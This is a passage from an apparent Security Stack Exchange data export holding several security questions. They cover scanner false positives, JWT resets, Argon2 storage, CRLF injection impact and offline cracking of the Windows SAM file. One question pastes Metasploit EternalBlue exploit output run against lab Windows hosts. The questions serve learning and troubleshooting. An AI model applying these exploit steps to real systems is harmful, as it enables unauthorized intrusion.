It seems it is picking up the word ""create-user"" from the template name and assuming it to be an OS/library method being called to create a user based on some user input, which is why it is complaining, but this sounds pretty dumb on Veracode's part.

+ +

Is it really a security issue, and if so, why? Or is it a false positive?

+",143010,,,,,1/7/2020 10:14,"VeraCode static code scan of django view reports ""External control of Filename or Path"" on render method",,1,4,,,,CC BY-SA 4.0 +223754,1,,,1/6/2020 13:00,,1,397,"

I have the following code in my frontend JavaScript which basically reads the CSRF cookie value and sets it in the AJAX calls done via jQuery.

+ +
    var csrftoken = self.getCookie('csrftoken');
+    xhr.setRequestHeader(""X-CSRFToken"", csrftoken);
+
+ +

This seems to be a very standard technique and yet Veracode reports it as a vulnerability.

+ +

Looking at the details of this kind of vulnerability at https://cwe.mitre.org/data/definitions/113.html, I don't see how it could be an issue, given that the HTTP header is being set on the client end and not the server end. If the CSRF token value is injected wrongly, the request would not succeed anyway due to the CSRF mismatch.

+ +

Why does Veracode consider this to be a vulnerability at all or is it a vulnerability that I am unable to understand?

+",143010,,,,,2/25/2022 18:05,"VeraCode static code scan reports ""Improper Neutralization of CRLF Sequences in HTTP Headers"" for frontend code",,2,0,,,,CC BY-SA 4.0 +223758,1,,,1/6/2020 14:24,,1,1746,"

Is it possible to break a Windows encrypted SAM file where passwords are stored if you have the physical drive offline?

+ +

Thanks

+",224512,,,,,1/9/2020 3:39,Breaking SAM windows password file offline,,1,0,,,,CC BY-SA 4.0 +223760,1,,,1/6/2020 14:38,,0,216,"

I found CRLF injection on a site, but it doesn't have any login, session or anything of that sort. I wonder if there's any way to prove the impact of CRLF injection here.

+ +

Something that I think can be done is that an attacker can craft the payload in such a way that the response would contain a Location header and the user would be redirected to a malicious site. This is called response splitting. But I'm not sure if the company would consider this a vulnerability, because users can only be redirected.

+ +

I asked myself if that's the only thing an attacker can do. After some time I realized XSS can also be performed with response splitting, but what would an attacker get with XSS, as there is no session cookie or anything?

+ +

I can't figure out how to show an impact of this. Are you aware of any interesting header or anything else that could help?

+ +

EDIT: I found a broken link to an external site on this same forum and checked for content on wayback.

+ +

It says:

+ +
+

Cross-User Defacement: An attacker can make a single request to a vulnerable server that will cause the server to create two responses, the second of which may be misinterpreted as a response to a different request, possibly one made by another user sharing the same TCP connection with the server. This can be accomplished by convincing the user to submit the malicious request themselves, or remotely in situations where the attacker and the user share a common TCP connection to the server, such as a shared proxy server. In the best case, an attacker can leverage this ability to convince users that the application has been hacked, causing users to lose confidence in the security of the application. In the worst case, an attacker may provide specially crafted content designed to mimic the behavior of the application but redirect private information, such as account numbers and passwords, back to the attacker.

+
+ +

But I don't understand it properly, can anyone please explain it in simple words?

+",224511,,224511,,1/6/2020 14:56,2/5/2020 16:03,Is there an impact of CRLF injection on static sites?,,2,0,,,,CC BY-SA 4.0 +223765,1,,,1/6/2020 15:52,,1,340,"

The following questions regard linux processes with a stack that grows downwards from the end of the process memory.

+ +
    +
  1. If I have a buffer overflow on the heap with unlimited size, are there any protections against me overwriting the entire process memory until reaching the stack and overwriting it?

  2. +
  3. Same question for buffer overflows in mmapped memory regions, which in comparison to the heap can reside closer in memory to the stack.

  4. +
+ +

Thanks!

+",224518,,,,,9/28/2020 2:06,Can a heap/mmap buffer overflow overwrite the stack,,1,0,,,,CC BY-SA 4.0 +223768,1,,,1/6/2020 16:47,,3,286,"

I am trying to write an API that allows the user to reset their password via their email.

+ +

I have been following https://www.smashingmagazine.com/2017/11/safe-password-resets-with-json-web-tokens/, but I am a bit confused. They are sending the email and user_id in the payload as JSON, but they never actually need this information. The only time they use the payload data is when they could easily retrieve the same data from another source.
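For reference, a generic PyJWT sketch of a reset token that carries user_id in the payload; this is not necessarily exactly what the linked article does, and the secret and field names are placeholders.

import datetime
import jwt   # pip install PyJWT

SECRET = 'server-side-secret'

def make_reset_token(user_id):
    payload = {'user_id': user_id,
               'exp': datetime.datetime.utcnow() + datetime.timedelta(hours=1)}
    return jwt.encode(payload, SECRET, algorithm='HS256')

def verify_reset_token(token):
    # raises jwt.ExpiredSignatureError / jwt.InvalidTokenError on bad tokens,
    # otherwise returns the payload, including the user_id to reset
    return jwt.decode(token, SECRET, algorithms=['HS256'])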

+ +

So what is the point in sending it?

+",224522,,19891,,1/6/2020 18:16,9/28/2021 11:02,What is the point of the payload in reset password API with JWT,,1,0,,,,CC BY-SA 4.0 +223774,1,223775,,1/6/2020 22:03,,3,328,"

I'm working on an Interactive Fiction story in Undum, which is a fully client-side JS/HTML5 framework. I've been reading about Content Security Policy lately (after looking up what a crypto nonce is) and began to wonder if any such thing would be important for code that's entirely client-side. I'd apply some basic CSP if I could, mainly the ban on inline code exec, but it looks like that can only be specified in an HTTP header which I don't control in this case (I think -- there's no transfer happening in my game, but github pages hosts the HTML and JS so HTTP is in use and is presumably controlled by github)

+ +

This question addresses a similar concern, but is a simpler context since it will be running locally on that OP's machine. My context will be as follows:

+ +
    +
  • Where is the HTML and JS hosted: my github pages account. It's not actually up there yet, but a different one implemented in Inform 6 and run on a JS Inform interpreter (Quixe) is here and I don't see an obvious CSP in the HTTP headers
  • +
  • Where do dependencies come from: local JS files, jquery and undum library only
  • +
  • What operations are involved: clicking generated links within the page, generating/rendering HTML from local JS (no arbitrary text user input), writing to/reading from HTML5 window.localStorage object if available to support game save/load
  • +
  • Protocol: HTTPS
  • +
+ +

What security concerns might be relevant to a kinda sorta web app like this? There's no sensitive data involved; I'm mostly concerned with any sort of malicious script injection that might be possible.

+",142166,,142166,,1/6/2020 22:11,1/6/2020 22:51,What security concerns are there for a fully client-side JS/HTML5 app?,,1,1,,,,CC BY-SA 4.0 +223782,1,,,1/7/2020 2:05,,1,755,"

I'm building an SPA app and I have to use an access token to make requests to an API. The most common way to store the JSON Web Tokens is to use localStorage, but I have always thought that was a bad idea because of XSS attacks or a user could be socially engineered to go to the console, get the token and give it away.

+ +

So I use this JavaScript library called 'secure-ls', which uses localStorage but encrypts the data. The encryption key is randomly generated for each instance of the application, so I don't store it as plain text in the code.

+ +

This is what it looks like:

+ +
private static _instance: SecureStorage = new SecureStorage({
+    encryptionSecret: crypto.randomBytes(60).toString(),
+});
+
+ +

This is what the encrypted data in the console looks like:

+ +

+ +

The plain-text data in localStorage is only available to the code. I believe this is sufficiently secure and I can't see how a hacker could get the plain-text data.

+ +

So it leaves me to wonder why more people don't use this method? Or is there some loophole I'm missing in how a hacker could get the data?

+",224539,,,,,1/7/2020 2:55,Is encrypting localStorage data more secure?,,1,1,,,,CC BY-SA 4.0 +223786,1,231004,,1/7/2020 4:11,,0,157,"

Can this method of encryption prevent bruteforce attacks?

+ +

If I had a hypothetical table (or function) where every grammatically valid sentence (limited to some number of words) was given an associated number, e.g:

+ +
""Good morning, how are you."" = 3283
+""Today is a nice day."" = 2183
+
+ +

Then added a number (as a key), e.g:

+ +
3283 + 1234 = 4516
+
+ +

Wouldn't this final output of 4516 be effectively protected against bruteforce attacks?

+ +

Ignoring the difficulty of producing a hashtable/function capable of reducing every valid input into a single number, and the issue of sending the key 1234 securely.

+ +

Is there any way of finding the original input only from the output?

+ +

Is limiting the domain of the encryption to only valid inputs, an effective method of preventing bruteforce attacks?

+ +

If so is there any practical example of this? Why or why not?

+",211767,,211767,,6/13/2020 11:47,6/13/2020 11:47,Can bruteforce attacks be prevented with tables of valid inputs?,,1,15,,,,CC BY-SA 4.0 +223795,1,,,1/7/2020 8:41,,1,446,"

There must be a handy way to securely store, say, a GCP key.json somewhere on my machine and access it whenever I'm deploying stuff. Backup to the cloud is a must. Apple's Keychain Access seems troublesome. Is there a better solution?

+",141727,,,,,1/7/2020 13:52,How do I securely store credentials and key files on my mac?,,2,3,,,,CC BY-SA 4.0 +223801,1,,,1/7/2020 9:22,,4,655,"

Proprietary software developed by a (smallish) company is stored in the company's GitHub private repository. For work, software engineers are requested to create a company-specific GitHub account bound to their work email address.

+ +

But access to the private repository can be granted or revoked independently from the ""account origin"". What are the risks of developers using a personal GitHub account (i.e. one associated with an email which is not related to the company)?

+ +

Edit: I see one potential risk: if the account is used also for other things than work, its SSH key is likely to be saved also in places where these ""other things"" are done. This is a potential threat to work repositories; with a dedicated account, it's easier for the developer to keep the key(s) only in work-related (maybe controlled) environments.

+ +

Are there any other specific risks?

+",50647,,50647,,1/7/2020 10:26,1/7/2020 10:26,Risks of allowing employees using personal GitHub accounts for work,,1,1,,,,CC BY-SA 4.0 +223805,1,,,1/7/2020 9:49,,2,959,"

I've decided to use Argon2id for storing users' passwords in my database. I have two questions:

+ +
    +
  1. Because there are several input parameters (parallelism, iterations, etc.) that influence the output, I'm wondering if it's a good idea to store those parameters in the database, e.g. in a column next to the stored password hashes. Can it somehow decrease the security? (If helpful, see the sketch below.)
  2. +
  3. Because the users of our application can have different computers (our application runs on their side; it's a Windows app) and thus different computing power, how do I correctly set those parameters so that hashing is secure enough but not too slow for users? Are there any recommended settings? Or would the best way be to run a performance test before the first run of the app and choose the parameters according to that (e.g. with the goal that calculating the password hash takes between 300-500 ms)?
  4. +
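Regarding question 1, a small sketch with the argon2-cffi package: the encoded string it produces already embeds the salt and the parameters, so a single column is enough and verification reads them back from the string. The numbers below are only example values.

from argon2 import PasswordHasher   # pip install argon2-cffi

ph = PasswordHasher(time_cost=3, memory_cost=65536, parallelism=2)

stored = ph.hash('correct horse battery staple')
# stored looks like: $argon2id$v=19$m=65536,t=3,p=2$<salt>$<hash>

ph.verify(stored, 'correct horse battery staple')   # raises on mismatch
if ph.check_needs_rehash(stored):                    # parameters were raised since
    stored = ph.hash('correct horse battery staple')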
+",224565,,98538,,1/7/2020 10:17,2/6/2020 11:01,Storing Argon2id parameters in a database?,,1,5,1,,,CC BY-SA 4.0 +223813,1,223815,,1/7/2020 13:06,,3,157,"

I have been using LastPass for a while and I have just seen an option to generate an exposure report. By its output, I assume it checks various sources containing credential dumps from hacked web applications for matches to my username / e-mail.

+ +

The output looks like the following:

+ +
{date 1}
+somedomain.com
+
+{date 2}
+some collection name
+
+{date 3}
+Unknown source
+
+ +

I am curious about how such applications work behind the scenes. Also, is there a way to find out more about my exposed e-mail in such dumps (i.e. more sources)?

+ +

I see that haveibeenpwned.com lists many breaches, so I could consume their API to validate against my known hostnames. As a side note, somedomain.com is not listed by Pwned websites.
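As an aside, the password side of this is easy to try out: many tools use the k-anonymity range endpoint of Pwned Passwords, where only the first five hex characters of the SHA-1 leave your machine. Breach lookups for an e-mail address use a different HIBP endpoint that needs an API key. A small sketch:

import hashlib
import requests

def pwned_count(password):
    digest = hashlib.sha1(password.encode()).hexdigest().upper()
    prefix, suffix = digest[:5], digest[5:]
    resp = requests.get('https://api.pwnedpasswords.com/range/' + prefix)
    for line in resp.text.splitlines():
        candidate, count = line.split(':')
        if candidate == suffix:
            return int(count)   # times this password appears in known dumps
    return 0

print(pwned_count('password123'))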

+ +

Question: How do applications such as password managers check leaked credentials and how can I get more results?

+",164712,,164712,,1/7/2020 13:14,1/7/2020 14:34,How do applications such as password managers check leaked credentials and how can I get more results?,,1,0,,,,CC BY-SA 4.0 +223817,1,,,1/7/2020 13:59,,2,128,"

A company has several remote branch offices located in relatively dangerous places, such as Iraq, and I'm looking into strategies to secure the SAN in the event of theft or looting. The data is commercially sensitive and contains intellectual property. Some of these offices are mobile, moving locations every couple of months.

+ +

Basically, the goals are:

+ +
    +
  1. Prevent data from the SAN falling into the hands of others
  2. +
  3. Prevent the destruction of data
  4. +
+ +

Each site has:

+ +
    +
  • A VPN, providing access to a central data centre in the USA (over a satellite link, sometimes as low as 4MB/s)
  • +
  • A local, highly-available ESXi cluster (note the vCentre server is located in a central data centre in Europe)
  • +
  • Virtual SAN storage (using StorMagic)
  • +
  • No local backups; backups are done remotely to a central data centre in Europe. The satellite links are often slow, and sites can sometimes be without access for several hours
  • +
+ +

At present, no data is encrypted - for this question, that's what I want to focus on.

+ +

Do you have any suggestions? Should we encrypt at the SAN level, the vSphere level, the OS level? How should keys be managed?

+",224584,,224584,,1/7/2020 14:37,1/7/2020 18:37,Strategies to protect SANs in branch offices in risky places,,1,3,,,,CC BY-SA 4.0 +223818,1,,,1/7/2020 14:24,,2,132,"

We are currently trying to enhance the security posture of our company, and this means changing how some IT personnel work.

+ +

Put precisely, our IT helpdesk currently have 2 separate accounts: 1 for normal day-to-day usage (mails, internet, etc...), and 1 for administrative tasks. The latter is a privileged account having several rights on the AD and some servers.

+ +

The way they work is not very secure when it comes to supporting the users: they use their privileged account to login to the user's workstation and perform tasks where admin rights are needed.

+ +

But my question is more accurately related to network drives being mapped in their privileged account's profile. They insisted on using the same logon script as with their standard account.

+ +

Do you have any recommendations, references to guidelines, and/or best practices in such a case? I'd like to present them some resources to convince them it's not secure to have network drives mapped in this profile.

+ +

I tried to explain to them that if they log in to a 'contaminated' workstation, their privileges might spread the infection to the network... But they did not understand and argued that they need to access some files on the network while assisting the users. They don't want to waste time typing UNC paths, etc.

+",219676,,129883,,1/8/2020 7:35,1/8/2020 7:35,Best practices or advice to convince IT admins not to map network drives in privileged sessions with users,,0,7,,,,CC BY-SA 4.0 +223819,1,223824,,1/7/2020 15:38,,0,283,"

Recently, we migrated from Windows 7 to Windows 10, and during that migration we progressively ran into some issues with our NAS device. To be more precise, we progressively noticed some TCP socket flooding on it while client computers were upgraded to Windows 10. We suspect that our NAS has some difficulties with NTLM, but this is out of the scope of this question.

+ +

Our NAS has a FQDN : filesvr1234.prod.company

+ +

We also have a DNS alias pointing to that FQDN : prodfiles.company

+ +

Kerberos authentication is enabled on filesvr1234.prod.company, but not on the alias prodfiles.company because we have some legacy apps that need NTLM.

+ +

We investigated those issues by running Wireshark while trying to read a file from a Samba share on our NAS (\prodfiles.company\shared\test.txt).

+ +

We observed the following behaviour. Both Windows 7 and Windows 10 first try to authenticate using Kerberos.

+ +

Windows 10 will try to authenticate using the alias prodfiles.company (which is the expected behaviour because we access the share via \prodfiles.company\shared\test.txt); it ends up using NTLM. However, we noticed that Windows 7 uses the FQDN (filesvr1234.prod.company) instead of the DNS alias, even though we access the share using the alias (\prodfiles.company\shared\test.txt); it uses Kerberos.

+ +

To see this, we looked at ""SNameString"" in KRB5 packets (Wireshark). To summarize: we read a file at \prodfiles.company\shared\test.txt; Windows 7 uses filesvr1234.prod.company even though we access the share using prodfiles.company, while Windows 10 uses prodfiles.company.

+ +

Did something change between Windows 7 and Windows 10 that makes the authentication process use the DNS alias instead of the FQDN?

+",178974,,,,,1/7/2020 17:42,Does Kerberos authentication handle DNS names the same way between Windows 7 and Windows 10?,,1,0,,,,CC BY-SA 4.0 +223820,1,,,1/7/2020 16:18,,1,138,"

I received a message with the famous link My-love co via Whatsapp and I never clicked on the link; I blocked the contact and deleted the message containing it; such a link was reported as infected by the newspapers.

+ +

Despite the fact that I didn't click on it, a strange icon with the profile picture and the name of the person who sent it to me appeared in my home. I reset my phone then and reinstalled WhatsApp by recovering the backup of the chats.

+ +

No traces of the infected link in there (because I deleted the message before resetting the phone), so I was no longer worried about it and I sent a message to the contact. +After that, I blocked him again to avoid the possibility of other infected messages.

+ +

Today that strange icon with his name and profile picture appears again on my home. I cannot find it in the APPs list.

+ +

I never clicked on any link and I did hardware reset, so my questions is:

+ +

Why is such a virus there, and why is it still there even after the hardware reset? Is it possible that the infected WhatsApp account is able to spread the trojan simply by being in the contact list of my phone, or because I opened his message (even though I didn't click on the link)? Or might my SIM card be virus-infected instead?

+",96606,,96606,,1/7/2020 16:21,1/7/2020 16:21,How I rescue my Android from a trojan and how did I get it?,,0,7,,1/7/2020 16:20,,CC BY-SA 4.0 +223822,1,,,1/7/2020 17:02,,1,130,"

The a=crypto attribute in RFC 4568 has a separate section 9.2. for SRTP "Crypto" Attribute Grammar. What it basically includes is a list of attribute values required for encrypting media (crypto suite, method, session params, keys, MKI...).

+

However, DTLS-SRTP also does the same (RFC 5764 - SRTP Extension for DTLS). So, is it correct to say that where DTLS-SRTP is used, the a=crypto: attribute is not used. For example, does webRTC offer-answer SDP use the "a=crypto:" attribute as DTLS-SRTP is a must for webRTC?

+

Informational RFC "SDP for webRTC" also does not throw any light on this issue.

+

Please clarify.

+",221573,,-1,,10/7/2021 7:24,1/7/2020 17:02,Is the SDP a=crypto attribute relevant when DTLS-SRTP is used?,,0,0,,,,CC BY-SA 4.0 +223825,1,223835,,1/7/2020 17:50,,1,167,"

I am a junior web developer. All I know is mostly about web development; I have no skills or knowledge in system security and know little about Linux.

+ +

I work in a company which is developing some embedded product. In the R&D department, some developers built a build-server for development. They make our own Docker image and run Docker, including CI/CD and Gitlab service, in this server.

+ +

This build-server connects to our AD server. A developer can add his own public key to this server and then remotely log in to it with SSH and do development on it. We call it DevOps.

+ +

This server only works in our company's intranet or VPN, not open for public Internet.

+ +

The above is all background information.

+ +
+ +

A few months ago I read some IT security blogs about Docker security issues. It says that because the architecture of Docker is different from traditional VM, if the Docker image is backdoored, then the whole system will be easily hacked.

+ +

If I suppose that the person who built this build-server is not a good guy, and he backdoored the Docker images, is it possible that my account in this build-server could be hacked or usurped?

+ +

I mean, even if I use public-key SSH login without typing a password manually, does this risk still exist?

+ +

Second question: if the answer to the first question above is yes, what could I do to protect myself?

+ +

I mean, if the bad guy took over my account and did something bad (for example, leaking the company's development codebase using my account, or launching other attacks with it), how could I prove I am innocent?

+ +

I cannot discuss these suspicions with my colleagues because I have no evidence. I just worry about them becoming true, so I want to take some precautions, just in case. I also have no authorization to check or validate the server.

+ +

What could I do? Back up my laptop's login logs periodically? (But that seems irrelevant to the build-server.)

+",224599,,129883,,1/7/2020 19:53,1/7/2020 21:39,Risk of Docker backdoor allowing impersonation,,1,1,1,,,CC BY-SA 4.0 +223827,1,223843,,1/7/2020 18:24,,3,212,"

I am completely new to cryptography but have been trying to make myself familiar with the concepts and applications. I have a project where I believe cryptography to be beneficial.

+ +

Project Info:

+ +

DB = MySQL 5.6

+ +

Engine = InnoDB

+ +

My application will reside on an intranet web server behind a network firewall with a very small white-list. Few users of this application will have the ability to add/remove values from the database. A larger number of users would be able to read these values. Values I would hope to encrypt could include:

+ +
    +
  • emails
  • +
  • account numbers
  • +
  • paths
  • +
  • dates
  • +
  • unique ids
  • +
+ +

Largest table(s) would have up to 150k entries and total sessions likely to remain under 100.

+ +

Being an intranet site I assume (with limited security knowledge) that my primary threats will be malicious users, hardware theft, and persistent XSS from an internal or external source. I am doing my best to mitigate all of these.

+ +

Doing some research on how to encrypt my data while allowing it to be searchable leaves me with a few options (please correct wrong information);

+ +
    +
  • CipherSweet Blind Indexing: requires library, may be overkill, false positives possible
  • +
  • MySQL AES_ENCRYPT/DECRYPT: if logs are compromised plaintext values will also be compromised
  • +
  • Application Side: runtime ""nightmare"", heavy load, could cause issues with multiple threads running
  • +
+ +

Questions

+ +
    +
  1. While ugly and poor practice, would application-side encryption/decryption be acceptable for my environment?
  2. +
  3. Would the likelihood of false positives with CipherSweet be negligible for my datasets?
  4. +
  5. Given my environment, would letting MySQL handle the encryption/decryption be acceptable (neglecting hardware theft or server compromise)
  6. +
  7. Bonus - should I be worrying about external XSS given my environment
  8. +
+ +

I understand this question may fall into the category of discussion and if that is the case please direct me to where I may find further information to narrow my questions.

+ +

EDIT

+ +

I am now also exploring the possibilities of using CryptDB or TDE.

+ +

EDIT 2

+ +

I am working with MySQL Community Edition so it seems TDE will not be available to me unless there is a way to specifically acquire only this feature. Continuing to research other options. Any information is appreciated.

+ +

EDIT 3: For my OS I don't think I will be able to use CryptDB, as its docs say:

+ +
+
    +
  • Requirements: > Ubuntu 12.04, 13.04; Not tested on a different OS.
  • +
+
+",223054,,223054,,5/18/2020 19:29,5/18/2020 19:29,Database Security - Encryption & Searching,,1,2,,,,CC BY-SA 4.0 +223838,1,223882,,1/7/2020 21:53,,2,328,"

I have almost 0 knowledge of IoT, their protocols and usual device constraints. I had a discussion today with someone that has a fair amount of IoT experience and we were discussing some security related issues and the establishment of a shared key came up. I assumed that Diffie-Hellman would be used but this person seemed to not be familiar with the method and based on their knowledge for low power devices, the keys are actually preloaded inside.

+ +
    +
  1. Is this a real scenario?
  2. +
  3. Is it possible for a DH exchange to be too intensive for a low-powered device? (See the sketch after this list for a sense of what a modern exchange involves.)
  4. +
  5. What role does Ephemeral Diffie–Hellman Over COSE (EDHOC) play in this case? Is it a good alternative or still problematic?
  6. +
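To make question 2 concrete, a minimal sketch of what a modern (EC)DH exchange involves, using X25519 from the Python cryptography package. This only shows the moving parts; it says nothing about what a given microcontroller can afford, and the second key pair here just stands in for the remote party.

from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.kdf.hkdf import HKDF

device_key = X25519PrivateKey.generate()
server_key = X25519PrivateKey.generate()        # stand-in for the other party

shared_secret = device_key.exchange(server_key.public_key())
session_key = HKDF(algorithm=hashes.SHA256(), length=32,
                   salt=None, info=b'iot session').derive(shared_secret)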
+",146090,,146090,,1/8/2020 13:04,1/8/2020 22:07,Using Diffie-Hellman exchange on low power IoT devices,,2,3,,,,CC BY-SA 4.0 +223845,1,223846,,1/8/2020 1:21,,3,199,"

I am unsure about how extensions are handled in TLS v1.2.

+

During the handshake, the client is able to add some extensions during ClientHello. As far I understood, the server can pick arbitrary subsets from this list in ServerHello similar to picking the cipher suite, which the client provided during ClientHello. Is this correct?

+

If not, is it that the server can either take all those extensions into account, or must abort the handshake? I am not sure which is true.

+

I was looking for an adequate answer here in RFC5246, but didn't really find the one statement I am looking for.

+",209776,,-1,,10/7/2021 7:59,1/8/2020 2:05,TLS 1.2 Handshake: Does the server have to take all extensions sent by the Client?,,1,1,,,,CC BY-SA 4.0 +223848,1,,,1/8/2020 5:17,,1,318,"

I'm developing a solution for secure chat over instant messaging, here is the scenario:

+ +

I need to encrypt my message then send it on {Whatsapp, telegram, Wechat,...}, I don't trust any software above, so I use an app on my cellphone to encrypt/decrypt messages, basically it works like a translator.

+ +

However, the first idea turns to be naive, because it's really hard to ensure the cellphone itself not to be hacked, for example, the clipboard.

+ +

Therefore the current idea is, to use a dedicated cellphone to encrypt and decrypt message, and it transmit/receive messages with my cellphone (the one runs IM apps) over Bluetooth. The goal is to isolate the hardware that possibly contacts the original text, so my cellphone can only read the encrypted messages.

+ +

Is Bluetooth here a good solution?

+ +

The following picture shows the rough idea. Phone A-1 and B1 should install only the encryption apps, and stay offline for any kinds of connections except the Bluetooth connection with A-2 and B-2.

+ +

+",181725,,6253,,1/9/2020 8:45,1/9/2020 8:45,Is Bluetooth on cellphone a reliable protocol for encrypted text transmission?,,2,1,,,,CC BY-SA 4.0 +223853,1,,,1/8/2020 9:46,,1,87,"

Until about a year ago, I was working for one of the big tech giants. During my time there, I noticed that the IT department would do a MITM attack on any website that employees access. i.e. if you opened GMail and Facebook, and you'd click the lock button on Chrome, you'd see that the certificate is a custom certificate rather than GMail's or Facebook's certificates. They would install these certificates on all company laptops, so effectively they had the ability to read and modify any website you'd access.

+ +

So far, pretty standard Big Brother stuff, right? I'd imagine that many big corporates in the US do the same.

+ +

I mentioned this to a colleague at lunch, and he said there's no way they would MITM any banking or other financial activity, because that would be illegal. After lunch, I tried to access the bank I use for my personal account, Bank HaPoalim, and indeed he was right. The certificate was Bank HaPoalim's, so my communication with them was secure.

+ +

This leads me to believe that big corporates have a list of ""banks we're not allowed to MITM"". I don't know whether they all share the same list, or each have their own. They might have the same for health-related information.

+ +

Now I have a client who runs a site that handles finanical information. They want to get in that list, so their customers would be able to access them without their employers sniffing their traffic.

+ +

My question is: Where is that list? How does one request to be added to it?

+",16116,,,,,1/8/2020 9:46,How to get on a list of sites that handle financial information?,,0,4,,1/8/2020 10:41,,CC BY-SA 4.0 +223854,1,,,1/8/2020 10:15,,1,135,"

I'm working on a Flask application which requires some authentication, but not on every endpoint. I use this piece of code to exclude certain endpoints from my authentication handler.

+ +
if request.path in NO_AUTH_PATHS or (re.match(r'/dashboard/.*', request.path) is not None):
+        return None
+
+ +

I then thought about what would happen if I were to make a call to https://<site_domain>/dashboard/../<restricted_path>

+ +

Fortunately I got an authentication error, and I made the call both via my browser (Firefox 71.0) and through curl v7.67. This leads me to believe that request.path is parsed as /<restricted_path> and not /dashboard/../<restricted_path>.

+ +

What I want to ask is: where does this parsing take place? If it's done by curl and Firefox before sending the request, this method might be a huge security issue.
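For illustration (the restricted path name below is made up), this is the dot-segment normalization in question, and something similar could be applied server-side as a belt-and-braces check instead of relying on whatever the client sends:

import posixpath

print(posixpath.normpath('/dashboard/../admin'))   # -> /admin
print(posixpath.normpath('/dashboard/./stats'))    # -> /dashboard/stats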

+",199237,,,,,1/8/2020 10:15,Circumventing authentication by relative path in flask,,0,5,,,,CC BY-SA 4.0 +223856,1,,,1/8/2020 10:24,,0,82,"

I have installed a VPN on my computer via OpenVPN and a vpnbook.com French server. When activated, IP sites correctly locate me in France (I am currently on holiday in another European country), yet some websites will still ""guess"" that I am not actually in France. One specific case is a TV replay website that will tell me that the content is not available in my country.

+ +

What could be the reason behind such a guess? How does the target website identify that the traffic coming from a French server is not actually coming from France? Does it have this server identified as ""VPN"" and thus tagged as ""foreign""?

+",224633,,6253,,1/8/2020 10:42,1/8/2020 10:46,Possible reasons for an incorrect VPN geolocalization,,0,2,,1/8/2020 10:44,,CC BY-SA 4.0 +223858,1,,,1/8/2020 11:03,,2,1750,"

I was trying to practice with meterpreter, so I used the ms17_010_eternalblue exploit with windows/meterpreter/reverse_https as the payload, but I am unable to make this payload work properly.

+ +

1st target: win2008r2 (10.0.0.6)
+2nd target: win7 (10.0.0.7)

+ +

Both without firewall, AV, connectivity is LAN (same adapter) as the attacker (10.0.0.1).

+ +

I've properly set all options (rhosts, lhost, lport...).

+ +

On the win2008r2 it goes like this:

+ +
[*] Started HTTPS reverse handler on https://10.0.0.1:443
+[*] 10.0.0.6:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
+[+] 10.0.0.6:445- Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)
+[*] 10.0.0.6:445- Scanned 1 of 1 hosts (100% complete)
+[*] 10.0.0.6:445 - Connecting to target for exploitation.
+[+] 10.0.0.6:445 - Connection established for exploitation.
+[+] 10.0.0.6:445 - Target OS selected valid for OS indicated by SMB reply
+[*] 10.0.0.6:445 - CORE raw buffer dump (51 bytes)
+[*] 10.0.0.6:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2
+[*] 10.0.0.6:445 - 0x00000010 30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20 008 R2 Standard
+[*] 10.0.0.6:445 - 0x00000020 37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63 7601 Service Pac
+[*] 10.0.0.6:445 - 0x00000030 6b 20 31 k 1
+[+] 10.0.0.6:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+[*] 10.0.0.6:445 - Trying exploit with 12 Groom Allocations.
+[*] 10.0.0.6:445 - Sending all but last fragment of exploit packet
+[*] 10.0.0.6:445 - Starting non-paged pool grooming
+[+] 10.0.0.6:445 - Sending SMBv2 buffers
+[+] 10.0.0.6:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+[*] 10.0.0.6:445 - Sending final SMBv2 buffers.
+[*] 10.0.0.6:445 - Sending last fragment of exploit packet!
+[*] 10.0.0.6:445 - Receiving response from exploit packet
+[+] 10.0.0.6:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+[*] 10.0.0.6:445 - Sending egg to corrupted connection.
+[*] 10.0.0.6:445 - Triggering free of corrupted buffer.
+[-] 10.0.0.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.6:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ +

It tries 3 times and then gives up. The host sometimes reboots, sometimes it doesn't. I tried this same exploit with other payloads like cmd and reverse_http and it works fine, so maybe I'm missing something in the HTTPS setup.

+ +

On the win7 machine, the result is interesting but disappointing:

+ +
[*] Started HTTPS reverse handler on https://10.0.0.1:443
+[*] 10.0.0.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
+[+] 10.0.0.7:445- Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
+[*] 10.0.0.7:445- Scanned 1 of 1 hosts (100% complete)
+[*] 10.0.0.7:445 - Connecting to target for exploitation.
+[+] 10.0.0.7:445 - Connection established for exploitation.
+[+] 10.0.0.7:445 - Target OS selected valid for OS indicated by SMB reply
+[*] 10.0.0.7:445 - CORE raw buffer dump (38 bytes)
+[*] 10.0.0.7:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima
+[*] 10.0.0.7:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service
+[*] 10.0.0.7:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
+[+] 10.0.0.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply
+[*] 10.0.0.7:445 - Trying exploit with 12 Groom Allocations.
+[*] 10.0.0.7:445 - Sending all but last fragment of exploit packet
+[*] 10.0.0.7:445 - Starting non-paged pool grooming
+[+] 10.0.0.7:445 - Sending SMBv2 buffers
+[+] 10.0.0.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
+[*] 10.0.0.7:445 - Sending final SMBv2 buffers.
+[*] 10.0.0.7:445 - Sending last fragment of exploit packet!
+[*] 10.0.0.7:445 - Receiving response from exploit packet
